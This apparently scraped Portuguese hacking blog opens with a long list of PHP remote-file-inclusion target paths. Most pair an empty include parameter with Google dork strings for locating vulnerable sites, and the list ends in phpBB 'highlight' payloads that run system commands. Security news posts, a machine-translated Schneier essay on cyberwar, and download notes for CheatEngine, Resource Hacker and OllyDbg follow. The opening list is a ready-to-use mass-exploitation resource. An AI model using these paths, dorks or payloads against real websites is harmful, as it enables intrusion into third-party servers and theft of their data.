/m2f/m2f_phpbb204.php?m2f_root_path=
/components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_minibb.php?absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/index.php?_REQUEST=&_REQUEST[option]=com_isi&_REQUEST[Itemid]=1&GLOBALS=&konfigKsp_pathAbsolut=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/skins/advanced/advanced1.php?pluginpath[0]=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

/s01.php?shopid= "powergap" + "s04.php" + "s01.php" + "s02.php"
/s02.php?shopid=
/s03.php?shopid=
/s04.php?shopid=
/s01.php?shopid=

/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= phpCodeGenie

/esupport/admin/autoclose.php?subd= "Helpdesk Powered by Kayako eSupport" site:com
/support/admin/autoclose.php?subd= "Helpdesk Powered by Kayako eSupport v2.2" site:com
/admin/autoclose.php?subd= "Helpdesk Powered by Kayako eSupport" site:com

/vwar/admin/admin.php?vwar_root= /modules.php?name=vWar "Powered by: Virtual War" site:ch "Powered by: Virtual War v1.5.0"
/modules/vwar/admin/admin.php?vwar_root= /modules.php?name=vWar "Powered by: Virtual War" site:ch "Powered by: Virtual War v1.5.0"
/modules/vWar_Account/includes/get_header.php?vwar_root= /modules.php?name=vWar "Powered by: Virtual War" site:ch "Powered by: Virtual War v1.5.0"
/modules/vWar_Account/includes/functions_common.php?vwar_root2= /modules.php?name=vWar "Powered by: Virtual War" site:ch "Powered by: Virtual War v1.5.0"
/includes/get_header.php?vwar_root=
/tsep/include/colorswitch.php?tsep_config[absPath]= "Powered By TSEP"
/index2.php?includes_dir= intext:"powered By Limbo CMS" site: de "index2.php?option=rss" Samba Samba 3.0.21
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= intext:"powered By Limbo CMS" site: de "index2.php?option=rss" Samba Samba 3.0.21
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
/index.php?option=
/classes/adodbt/sql.php?classes_dir=
/index.php?option=com_content&do_pdf=1&id=1index2.p hp? _REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=
/mambo/index2.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=&mosConfig_absolute_path=
/cvs/index2.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=
/articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
/cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1& GLOBALS=&mosConfig_absolute_path=
/skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"

/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id=" /phpwcms/
/include/inc_ext/spaw/dialogs/table.php?spaw_root=

/dreamaccount/auth.header.inc.php?da_path= intext:"powered by DreamAccount" site:de
/dreamaccount/auth.api.php?path= intext:"powered by DreamAccount" site:de

/printfriendly.php?file_path=
/SQuery/lib/gore.php?libpath= "SQuery 3.9" inurl:modules.php?name=SQuery
/SQuery/lib/armygame.php?libpath= "SQuery 4.5" "SQuery 4.0"

/print_friendly.php?flash=false&page=

/constants.php?SD_DIR=
/roster/lib/phpbb.php?subdir= "wow roster"
/lib/phpbb.php?subdir=
/phplive/setup/header.php?css_path= "PHPLive" "Powered by PHP Live"
/phplive/help.php?css_path= "PHPLive" "Powered by PHP Live"

/phpBB2/includes/db.php?phpbb_root_path= "Powered by phpBB 2.0.17"
/modernbill/include/html/config.php?DIR= allinurl:/modernbill/
/include/html/config.php?DIR= /modernbill/

/plugins/spamx/LogView.Admin.class.php?_CONF[path]= intext:"Powered By Geeklog" site:com
/Geeklog/plugins/spamx/LogView.Admin.class.php?_CONF[path]= allinurl:com/geeklog/

/questcms/main/main.php?pi= allinurl:"/questcms/" /questcms/

/includes/header.inc.php?dateiPfad= "software 2004-2005 by randshop" /shop/themes/kategorie/detail.php
/shop/includes/header.inc.php?dateiPfad= "software 2004-2005 by randshop" /shop/themes/kategorie/detail.php

/yabbse/Sources/Packages.php?sourcedir= intext:"Powered by Yabbse" siterg "Powered by Yabb se"

/phplivehelper/initiate.php?abs_path= intext:"PHPLiveHelper"
/toplist.php?f=toplist_top10&phpbb_root_path= inurl:"toplist.php" "powered by phpbb" "Toplist 1.3.8 © 2003"
/forums/toplist.php?f=toplist_top10&phpbb_root_path=
/forum/toplist.php?f=toplist_top10&phpbb_root_path=

/admin/config_settings.tpl.php?include_path=
/include/common.php?include_path=
/event/index.php?page= "/event/index.php?page=" "Artmedic Event"
/forum/index.php?includeFooter= "miniBB forum" site:co.uk "Powered by miniBB" /forum/index.php?action=vtopic forum/index.php?action=registernew site:com
/forums/index.php?includeFooter= "miniBB forum" site:co.uk "Powered by miniBB" /forum/index.php?action=vtopic forum/index.php?action=registernew site rg
/forum/bb_admin.php?includeFooter= "miniBB forum" site:co.uk "Powered by miniBB" /forum/index.php?action=vtopic forum/index.php?action=registernew site:net
/forums/bb_admin.php?includeFooter=

/language/lang_english/lang_activity.php?phpbb_root_path= "Blend Portal" site:de "Activity MOD Plus" "Protected by phpBB"
/forum/language/lang_english/lang_activity.php?phpbb_root_path= "Blend Portal" site:de "Activity MOD Plus" "Protected by phpBB"
/blend_data/blend_common.php?phpbb_root_path= "Blend Portal" site:de "Activity MOD Plus" "Protected by phpBB"

/admin/config_settings.tpl.php?include_path= "Powered by I-Rater Platinum"
/include/common.php?include_path= "Powered by I-Rater Platinum"

/w-agora/include/postgres.php?inc_dir= "Powered by W-Agora" allinurl:de/w-agora/
/w-agora/forgot_password.php?inc_dir= "Powered by W-Agora"
/forums/include/postgres.php?inc_dir= allinurlrg/w-agora/
/forum/include/postgres.php?inc_dir= allinurlrg/w-agora/

/metajour/app/erek/erek_comp_model_caseopen.php?system_path= "metajour"
/adminbereich/admin.php?config[fsBase]= intext:"Fastpublish CMS"
/suche/search.php?config[fsBase]= intext:"Fastpublish CMS"
/rechnung.php?config[fsBase]= intext:"Fastpublish CMS"
/email_an_benutzer.php?config[fsBase]= intext:"Fastpublish CMS"
/drucken2.php?config[fsBase]= intext:"Fastpublish CMS"
/drucken.php?config[fsBase]= intext:"Fastpublish CMS"
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-Nuke" site:hu "PHP-Nuke" com/modules.php?name=Forums

/news/ashnews.php?pathtoashnews= "ashnews" "powered by ashnews"
/ashnews.php?pathtoashnews= "ashnews" "powered by ashnews"
/master.php?root_path= "openphpnuke"
/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base" "Powered by Orion based on phpBB"
/forum/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base" "Powered by Orion based on phpBB"
/forums/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base" "Powered by Orion based on phpBB"
/classes/phpmailer/class.cs_phpmailer.php?classes_dir= "Powered by CS-Cart" site:de
/shop/classes/phpmailer/class.cs_phpmailer.php?classes_dir= "Powered by CS-Cart" site:de

/classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss" "powered By Limbo CMS"
/agenda.php3?rootagenda= "Powered by phpMyAgenda"
/agenda2.php3?rootagenda= "Powered by phpMyAgenda"
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/topsites/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/toplist/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/topsite/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/topsites/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/toplist/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/topsite/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" "Powered By Aardvark Topsites" site:de
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath= "Php Blue Dragon CMS"

/extras/poll/poll.php?file_newsportal= "Newsportal" "TR Newsportal"
/library/lib.php?root= "DCP-Portal CMS" site:com

/index.php?site_path= "Powered by SocketMail"
/mail/index.php?site_path= "Powered by SocketMail"

/phpBB2/viewtopic.php?t=1218&highlight='.system('id;uname% 09-a').'
/viewtopic.php?t=138&rush=%65%63%68%6F%20%5F%53%54% 41%52%54%5F%3B%20uname%20-a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2 527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F% 47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 ';
/viewtopic.php?t=1&highlight='.printf(__INICIO__).s ystem(id).printf(__FIM__).'
/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?module=PostWrap&page=
/oneadmin/config.php?path[docroot]=
/b2-tools/gm-2-b2.php?b2inc=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/maillist/admin.php
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_

Microsoft alerta para falha crítica que atinge aplicações em ASP.Net

2010-09-23T11:29:00.000-03:00

Hackers que descobriram a vulnerabilidade estimam que 25% de todos os sites estejam sujeitos a ataques devido ao problema.

A Microsoft alertou na última sexta-feira (20/09) que uma falha crítica no ASP.Net – ambiente de programação em servidores Windows – poderia ser usada por hackers para invadir páginas criptografadas da Web e roubar dados como nomes de usuário e senhas.
A vulnerabilidade se tornou pública neste mesmo dia, pouco antes do anúncio da empresa, quando dois pesquisadores, que descobriram o problema, mostraram como explorá-lo em uma conferência de segurança realizada em Buenos Aires, Argentina.
De acordo com o comunicado da companhia de Redmond, a falha atinge todas as versões do ASP.Net. Portanto, uma correção terá que ser providenciada para todos os sistemas operacionais ainda suportados, do Windows XP Service Pack 3 (SP3) e Server 2003 ao Windows 7 e Server 2008 R2. Outros produtos, como o IIS e o SharePoint também serão atualizados.

Os hackers responsáveis pela demonstração, Rizzo e Duong, disseram que os ataques que exploram a falha podem acessar aplicativos Web com prioridade administrativa, provocando desde a “perda de dados sigilosos à destruição completa do sistema”. Eles estimam que 25% de todos os sites usem o ASP.Net.

Enquanto a correção não vem
Embora a Microsoft tenha dito que uma correção está a caminho, ela não divulgou um cronograma. Enquanto isso, sugere aos desenvolvedores uma medida paliativa:
“Você pode se prevenir ao ativar o recurso customError do ASP.Net, e configurá-lo para sempre retornar a mesma página de erro – independentemente da falha encontrada no servidor”, escreveu Scott Guthrie, responsável por algumas equipes de desenvolvimento da empresa, inclusive a que comanda o ASP.Net. “Ao direcionar todas as páginas de erro a um único lugar, você impedirá que um hacker distinga entre os diferentes erros ocorridos”.
O diretor de operações de segurança da empresa nCircle Security confirmou que a vulnerabilidade é “preocupante”.
“Quanto aos serviços públicos, as pessoas ficarão temerosas com ataques que poderão acessar qualquer documento. Por exemplo, arquivos 'web.config', nos quais estão contidos o tradicional usuário/senha”.
Para ajudar os desenvolvedores, a Microsoft publicou um script em Visual Basic capaz de detectar a vulnerabilidade em aplicações ASP.Net, além de disponibilizar um fórum exclusivo para as perguntas referentes ao problema.

(Gregg Keizer)

2ª via OI, Brasil Telecom

2010-09-14T12:38:00.000-03:00

Fala Pessoal, depois de ficar perdendo o meu tempo com cadastros e etc pra TENTAR conseguir a segunda via de minha conta, consegui graças a algumas palavras chaves no google.

Pra facilitar e vocês não perderem tempo precioso como eu perdi aí vai o LINK pra retirar a 2 Via.

http://www.brasiltelecom.com.br/portal/BoletoPagamentoPF.do?acao=onVisualizar

Ameaça de "guerra cibernética" tem sido extremamente sensacionalistas

2010-07-13T22:40:00.001-03:00

Nota do Editor: Bruce Schneier é um especialista em segurança e autor de "Beyond Fear: Pensar sensatamente sobre segurança em um mundo incerto." Leia mais da sua escrita em http://www.schneier.com/

" Há uma luta de poder em curso no governo E.U. agora." CNN

É sobre quem é responsável pela segurança cibernética, e quanto controle o governo vai exercer sobre redes civis. E, batendo os tambores da guerra, os militares estão saindo por cima.

"Os Estados Unidos estão lutando uma guerra cibernética de hoje, e nós estamos perdendo", disse o diretor da NSA - e empreiteiro ciberguerra atual - Mike McConnell. "Cyber 11/09 tem acontecido ao longo dos últimos dez anos, mas aconteceu lentamente, de modo que não vemos isso", disse o ex-diretor National Cyber Security Division Amit Yoran. Richard Clarke, que substituiu Yoran, escreveu um livro inteiro exagerando a ameaça de guerra cibernética.

General Alexander Keith, o atual comandante do E.U. Cyber Command, hypes que cada chance que ele recebe. Este não é apenas retórica de alguns funcionários do governo ansioso e escritores manchete; todo o debate nacional sobre a ciberguerra é atormentado com exageros e hipérboles.

Pesquisando os nomes e termos - como "cyber Pearl Harbor", "cyber Katrina", e mesmo Armageddon "cyber" - dá uma idéia de como os memes são invasivos. Prefixo "cyber" algo assustador, e você acabar com algo realmente assustador.

Ciberespaço tem todos os tipos de ameaças, dia após dia. Cibercrime é de longe o maior: a fraude, através de roubo de identidade e outros meios, extorsão, e assim por diante. Cyber-espionagem é outra, tanto o governo e patrocinados por empresas. hacking tradicional, sem fins lucrativos, é ainda uma ameaça. Assim é o ativismo cibernético: as pessoas, na maioria das vezes as crianças, brincar de política, atacando o governo e empresas websites e redes.

Estas ameaças cobrem uma grande variedade de autores, as motivações, táticas e objetivos. Você pode ver a variedade no que a mídia tem erroneamente como "guerra cibernética". Os ataques contra os sites da Estónia em 2007 eram simples ataques de hackers russos por zangado com políticas anti-russas, as quais foram de negação de serviço ataques, um risco normal no ciberespaço e quase sem precedentes.

A comparação do mundo real podem ser, se um exército invadiu um país, então tudo ficou em linha na frente de pessoas no DMV para que eles não poderiam renovar suas licenças. Se é isso que a guerra parece que no século 21, temos pouco a temer.

Os ataques similares contra a Geórgia, que acompanhou a invasão real da Rússia, foram também, provavelmente, a responsabilidade dos ativistas cidadão ou o crime organizado. Uma série de blecautes no Brasil foi causado por extortionists criminal - ou era isoladores fuligem? China está praticando espionagem, não a guerra, no ciberespaço. E assim por diante.

Um problema é que não há definição clara de "guerra cibernética". O que lhe parece? Como isso começou? Quando é que acabou? Mesmo os peritos cibernética não sei as respostas para estas perguntas, e é perigoso em termos gerais se aplicam o termo "guerra" a menos que saibamos de uma guerra está acontecendo.

No entanto, notícias recentes têm reclamado que a China declarou guerra cibernética no Google, que a Alemanha atacou a China, e que um grupo de jovens hackers declarou ciberguerra na Austrália. (Sim, ciberguerra é tão fácil que até crianças podem fazê-lo.) É evidente que não estamos falando sobre a guerra real aqui, mas uma guerra de retórica: como a guerra contra o terror.

Temos uma grande variedade de instituições que possam nos defender quando atacados: a polícia, o militar, o Departamento de Segurança Interna, vários produtos comerciais e serviços, e os nossos advogados pessoais ou empresariais. O enquadramento legal para qualquer ataque em particular depende de duas coisas: o atacante eo motivo. Essas são precisamente as duas coisas que você não sabe quando está sendo atacado na Internet. Vimos isso em 4 de julho do ano passado, quando E.U. e sites da Coreia do Sul foram atacados por agressores desconhecidos da Coréia do Norte - ou talvez na Inglaterra. Ou era Florida?

Nós certamente precisamos melhorar a nossa segurança cibernética. Mas as palavras têm significado, e importa metáforas. Há uma luta de poder passar para o controle da estratégia de segurança cibernética da nossa nação, e da NSA e DoD está ganhando. Se enquadrar o debate em termos de guerra, se aceitarmos a definição da expansão militar do ciberespaço de "guerra", que alimentam nossos medos.

Nós reforçam a noção de que estamos desamparados - que pessoa ou organização pode se defender em uma guerra? - E os outros precisam para nos proteger. Convidamos os militares para assumir a segurança, e ignorar os limites do poder que muitas vezes se alijou durante a guerra.

Se, por outro lado, usamos a linguagem mais comedida do cibercrime, mudamos o debate. combate à criminalidade requer determinação e recursos, mas é feito dentro do contexto da vida normal. De bom grado dar poderes extraordinários a nossa polícia de investigação e de prisão, mas paciência esses poderes com um sistema judicial e as proteções legais para os cidadãos.

Precisamos estar preparados para a guerra, e um Cyber Command é tão vital como um exército ou Comando Aéreo Estratégico. E porque o miúdo hackers e cyber-guerreiros usar as mesmas táticas, as defesas que construímos contra o crime e espionagem também vai nos proteger de mais ataques concertados. Mas nós não estamos lutando uma guerra cibernética agora, e os riscos de uma guerra cibernética não são maiores que os riscos de uma invasão terrestre. Precisamos de paz cyber-segurança, administrado dentro da estrutura de uma miríade de instituições de segurança pública e privada que já temos.

Download CheatEngine

2010-07-13T13:30:00.001-03:00

CheatEngine 5.61

Tutoriais

Tutorial with Pinball for Windows XP
Tutorial to step 1 to 7 of the Cheat Engine tutorial (Explains a bit better)
Auto Assembler: Enabled while key down
Custom Scan: Auto multiply by 8 (And display divided by 8)

Download Resource Hacker

2010-07-13T11:36:00.000-03:00

Download Resource Hacker

Resource Hacker é um utilitário freeware para ver, modificar, renomear, adicionar, excluir e extrair recursos de executáveis 32 bits do Windows e arquivos de recursos (*. res). Ele incorpora um compilador de script de recurso interno e decompiler e funciona em Win95, Win98, WinME, WinNT, Win2000 e sistemas operacionais WinXP.

Visualizando Recursos: Cursor, Ícone, Bitmap, GIF, AVI, JPG e imagens de recurso podem ser vistos. WAV, MIDI e recursos de áudio podem ser reproduzidos. Menus, Dialogs, MessageTables, StringTables, Aceleradores, Delphi Forms e recursos VersionInfo podem ser vistos como scripts de recursos da descompilação. Menus e diálogos podem ser vistos também como eles aparecem em um aplicativo em execução.

Salvando os recursos: Os recursos podem ser salvos como arquivos de imagem (*. ico, *. bmp, etc), como arquivos de script (*. rc), como arquivos de recurso binário (*. res), ou como untyped arquivos binários (*. bin) .

Modificando Recursos: Os recursos podem ser modificados através da substituição do recurso com um recurso de outro arquivo (*. localizado no ico, *. bmp, *. res etc) ou usando o script de recurso interno do compilador (por menus, diálogos etc). Dialog controls can also be visually moved and/or resized by clicking and dragging the respective dialog controls prior to recompiling with the internal compiler. controles de diálogo também pode ser movido visualmente e / ou redimensionados, clicando e arrastando o diálogo respectivos controles antes de recompilar com o compilador interno.

Os recursos podem ser adicionados a um pedido de copiá-los a partir de arquivos de recursos externos (*. res).

Excluindo Recursos: A maioria dos compiladores adicionar recursos em aplicações que nunca são usados pela aplicação. Removing unused resources can reduce an application's size. Remoção de recursos não utilizados podem reduzir o tamanho de um aplicativo.

Site do Ministério do Planejamento é invadido por hacker

2010-07-11T18:58:00.000-03:00

A página do Ministério do Planejamento na internet foi invadida por um hacker neste fim de semana. O invasor substituiu os títulos de todas as notícias na capa do site pelo texto "Hacked by r4diationz - From Republic of Turkey". O hacker também impediu o acesso a notícias antigas dentro da página. Outras áreas do site não foram afetadas

Comando Cibernético” do exército norte-americano inclui “código” em logotipo

2010-07-11T18:50:00.000-03:00

Entusiastas do mundo cibernético “decifraram” um código incluído no logotipo tipo do US Cyber Command (USCYBERCOM), uma divisão do exército dos Estados Unidos que lida com questões cibernéticas inaugurada em maio. O código,“9ec4c12949a4f31474f299058ce2b22a”, é uma sequência formada por um algoritmo chamado MD5 a partir da “missão” do US Cyber Command.

Código está no anel dourado no logotipo da organização.
US Cyber Command tem pouco mais de um mês de
existência. (Foto: Divulgação)

Outros interessados tinham chegado a um código de barras do tipo QR que tinha o significado “Poder Cibernético”, mas esse significado é improvável. O MD5 é capaz de representar qualquer texto ou arquivo em apenas 32 caracteres, de números 0-9 e com letras de A até F. Por isso, o número de sequências é limitado e existem “conflitos”, que ocorrem quando dados distintos possuem a mesma sequência.

O US Cyber Command é uma divisão do exército que busca, segundo sua missão pública, coordenador e integrar as atividades militares no ciberespaço, defendendo as redes de computador do exército e realizando operações militares na internet, ao mesmo tempo em que “nega o mesmo aos adversários”.

Os detalhes da nova divisão são desconhecidos até para outros membros do exército, mas é possível que ela tenha sido criada como resposta às preocupações de “ciberguerra”. A capa da edição de julho da revista The Economist trata do assunto.

hackers extraem código de segurança do Skype

2010-07-11T18:48:00.000-03:00

Segurança por obscuridade” é quando algo só é seguro porque depende de um segredo. Era a tática do Skype. O código que protege a confidencialidade das chamadas está incluso no programa, mas está de tal forma que fica difícil compreendê-lo, impedindo que alguém consiga espionar as chamadas pela rede. Dez anos depois, o código foi finalmente decifrado. Ainda não se sabe, porém, se será realmente possível grampear chamadas VoIP.

O que impede que outras pessoas vejam os dados que trafegam na internet é a criptografia: embaralhar os dados de tal forma que apenas as partes envolvidas na conexão possam decifrá-los. E o Skype, para impedir que suas chamadas fossem “grampeadas” por outras pessoas na rede, inclui um sistema de criptografia. O problema é que os dois lados da conexão precisam conhecer a chave, e o Skype decidiu colocar o código dentro do próprio programa – o que é considerado um erro. Mesmo assim, hackers levaram uma década para conseguir extrair o código, possivelmente permitindo o grampo de chamadas VoIP.

O código completo usado pelo Skype está na web. Segundo o especialista que o publicou, o código havia vazado e, por isso, era justo que todos soubessem que a segurança do Skype havia sido quebrada. Se o fato continuasse sendo um conhecimento de poucos, eles poderiam tirar proveito disso enquanto usuários e empresas continuassem achando que estavam protegidos.

Nem tudo está perdido, é claro. O grampo de chamadas não está comprovado. Mesmo se ele for possível, é provável que apenas chamadas realizadas na mesma rede consigam ser grampeadas. Para quem usa o computador em casa e não tem uma rede sem fio insegura, isso significa que nada vai mudar. Na verdade, outros softwares de comunicação, como o MSN, nem oferecem semelhante segurança e alguns provedores de e-mail, menos ainda. Mesmo assim, o padrão de segurança em VoIP é mais elevado.

Por causa disso, há produtos no mercado que preenchem as lacunas deixadas por estas soluções. É o caso do Simp e do Off the Record Messaging.

A recomendação é simples: usar o software apenas em redes seguras. Uma nova versão do Skype com o erro solucionado deve ser lançada em breve. O pesquisador Sean O’Neill, que publicou o código, disse que iria dar mais informações na conferência Chaos Computer Congress (27C3), em Berlim, na Alemanha.

Download - OllyDbg - Last update: June 02, 2010 - final release.

2010-07-09T11:30:00.000-03:00

OllyDbg

INTRODUÇÃO (Texto de Fergo - www.fergonez.net )
Seguindo a minha linha de tutoriais voltados a programação, vou tratar sobre um assunto que me interessa muito e talvez seja interessante para os programadores em geral: disassembler e debuggers.
Primeiramente seria interessante esclarecer um pouco sobre o que é um debugger e o que é um disassembler, pois apesar de andarem quase sempre juntos, possuem finalidades diferentes.
Disassembler é algo que consegue transformar linguagem de máquina para a linguagem assembly, transcrevendo as instruções enviadas ao processador para os seus mnemônicos em assembly (asm). Não deve ser confundido com um descompilador, que procura converter o código nativo em uma linguagem de mais alto nível como C, C++ ou Basic.
Debuggers são programas capazes de analisar, depurar e testar aplicações. Atualmente a maioria das IDEs de programação contam com um debugger embutido (Visual Studio, por exemplo). A principal utilidade deles é para a identificação e tratamento de erro, sendo que é possível rodar o código linha por linha (ou instrução por instrução) e analisar a mudança das variáveis e do comportamento do código. Os debuggers de binários já compilados - como os executáveis do Windows (EXE) - seguem o mesmo conceito dos depuradores normais, mas devido ao fato de o código já ter sido compilado, ele precisa ter um disassembler embutido no debugger para decodificar as instruções.
Atualmente existem dezenas de debuggers e disassemblers por aí, dentre os quais os mais famosos são: W32DASM, IDA, WinDbg, SoftICE e Ollydbg. Neste tutorial será utilizado o OllyDbg, pois é um dos melhores e mais poderosos debuggers (incluindo um disassembler) disponíveis no mercado. É também pequeno e gratuito.

QUAL A UTILIDADE UM DEBUGGER?
Muita gente se pergunta do porquê de usar um debugger, sendo que na maioria dos casos você tem a acesso ao código fonte original (caso você tenha programado o aplicativo). Vou citar abaixo algumas das maiores utilidades de um debugger:

Tratamento de erro. Certamente uma das principais. Às vezes durante a programação de um aplicativo um pequeno erro passou despercebido, ocasionando mal funcionamento ou gerando uma operação ilegal. Em muitos casos é mais fácil você analisar o binário já compilado dentro de um debugger do que tentar encontrar o erro no código original. Dentro desse mesmo item podemos citar a correção de bugs de aplicações já descontinuadas (desde que com a autorização da empresa dona dos direitos).

Engenharia reversa. O processo de engenharia reversa de software não poderia ser feito de forma eficiente sem a utilização de um debugger/disassembler. Muitas pessoas tendem a confundir cracking com engenharia reversa, sendo que são conceitos diferentes. A engenharia reversa por si só é uma atividade completamente legal, pois muito do que vemos hoje só foi possível devido à engenharia reversa. A criação de drivers para Linux de periféricos que antes só funcionavam com o Windows (WinModems) é um bom exemplo de como a engenharia reversa traz coisas boas para nós.

Aprendizado. O uso de debuggers e engenharia reversa é uma das melhores formas de se aprender a linguagem assembly. Você programa algo em uma linguagem de médio ou alto nível e posteriormente analisa o resultado do binário compilado dentro de um debugger. Com esse conhecimento é possível dominar melhor a linguagem e criar algoritmos mais otimizados e eficientes.

CONCEITOS NECESSÁRIOS
Para entender o funcionamento de um debugger é preciso saber um pouco sobre alguns conceitos ligados a informática, como o funcionamento da memória, processador, pilhas e endereços. O conhecimento básico de assembly também é necessário, já que essa é a linguagem que teremos de analisar. Caso não tenha experiência em assembly, fique tranqüilo, pois nos capítulos seguintes darei uma visão geral sobre ela, o suficiente para entender o nosso mini-aplicativo de estudo. Abaixo segue uma breve lista de conceitos:

Processador/CPU: É o cérebro de todo computador. É ele que decodifica as instruções e executa os códigos operacionais. É composto basicamente por uma unidade lógico-aritmética (ALU), unidade de ponto flutuante (FPU), registradores, cachê, barramento e gerador de clock.
Memória RAM: Local de armazenamento temporário de dados (são apagados ao desligar o computador). Todo aplicativo se utiliza da memória para armazenar seus dados e estes são buscados e gerenciados pelo processador.
Endereçamento de memória: É uma faixa de valores que apontam para uma determinada posição de memória. Toda vez que você escreve ou lê algum dado da memória é necessário indicar o endereço de onde está aquele valor, para que o processador possa buscá-lo.
Pilha (Stack): É uma estrutura de dados. Sua principal característica é a forma de funcionamento, onde você apenas coloca ou retira os valores, sem indicar um endereço (LIFO – Last in, First Out – Último a entrar, primeiro a sair). Ela funciona de forma semelhante a uma pilha de livros em que você vai os empilhando. Quando precisar remover um deles, é necessário tirar todos os livros de cima.
Registradores: Pequenas partes de memória presentes dentro dos processadores (não confundir com memória RAM). Extremamente rápidas, sendo que a CPU as utiliza como forma temporária de armazenamento de dados e realização de operações. A quantidade de dados que podem ser armazenados vai depender do tipo de processador. Os processadores de 32 bits conseguem armazenar números de até 32 bits em cada registrador, sem precisar de rotinas de conversão.
UM POUCO DE ASSEMBLY
Para fazer o debug de binários compilados é necessário ter um conhecimento (ao menos básico) da linguagem assembly, já que é para ela que a linguagem de máquina é traduzida.
Assembly (ou asm, com é abreviada) é uma linguagem de baixo nível que basicamente interpreta os códigos operacionais (opcodes, veja abaixo) e os transcreve para seus mnemônicos. É literalmente uma tradução da linguagem de máquina. O uso da linguagem assembly pode ser bem variado, podendo fazer de tudo um pouco, mas é amplamente utilizada na programação básica de Kernels e em algoritmos que precisam ser altamente otimizados, onde asm é a linguagem ideal, já que é puramente linguagem de máquina traduzida.
Não pretendo agora explicar todo o funcionamento, estrutura e comandos da linguagem. Vou dar apenas um apanhado geral sobre alguns termos e uma breve descrição sobre os comandos mais básicos e corriqueiros que se encontra. Precisamos primeiramente definir o que são mnemônicos e o que são os opcodes.
